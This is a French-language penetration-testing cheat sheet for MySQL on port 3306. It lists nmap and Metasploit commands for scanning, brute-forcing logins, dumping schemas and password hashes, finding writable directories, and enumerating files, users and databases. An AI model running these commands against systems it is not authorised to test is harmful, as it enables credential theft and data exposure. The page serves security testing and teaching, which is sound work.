🔡MySQL - port 3306

Scan

$ nmap -sV -p3306 <target IP>

Connexion

$ mysql -h <host IP> -u <username> -p

Bruteforce

Avec metasploit:

msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file pass.txt
msf6 auxiliary(scanner/mysql/mysql_login) > exploit

Avec nmap:

nmap -p3306 --script=mysql-brute --script-args userdb=/root/Desktop/user.txt, passdb=/root/Desktop/pass.txt <target IP>

Dump schema

msf6 > use auxiliary/scanner/mysql/mysql_schemadump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > exploit

Dump hash

Avec metasploit:

msf6 > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > exploit

Avec nmap:

nmap -p3306 <target IP> --script=mysql-dump-hashes --script-args mysqluser=<username>,mysqlpass=<password>

Répertoires modifiables

msf6 > use auxiliary/scanner/mysql/mysql_writable_dirs
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set dir_list dir.txt
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > exploit

Enumeration des fichiers

msf6 > use auxiliary/scanner/mysql/mysql_file_enum
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set file_list files.txt
msf6 auxiliary(scanner/mysql/mysql_file_enum) > exploit

Enumeration des utilisateurs

nmap -p3306 <target IP> --script=mysql-users --script-args mysqluser=<username>,mysqlpass=<password>

Enumeration des bases de données

nmap -p3306 <target IP> --script=mysql-databases --script-args mysqluser=<username>,mysqlpass=<password>

PrécédentDocker - port 2375 SuivantLDAP - ports 389, 636, 3268, 3269

Mis à jour il y a 3 ans

hashtagScan

hashtagConnexion

hashtagBruteforce

hashtagDump schema

hashtagDump hash

hashtagRépertoires modifiables

hashtagEnumeration des fichiers

hashtagEnumeration des utilisateurs

hashtagEnumeration des bases de données

Scan

Connexion

Bruteforce

Dump schema

Dump hash

Répertoires modifiables

Enumeration des fichiers

Enumeration des utilisateurs

Enumeration des bases de données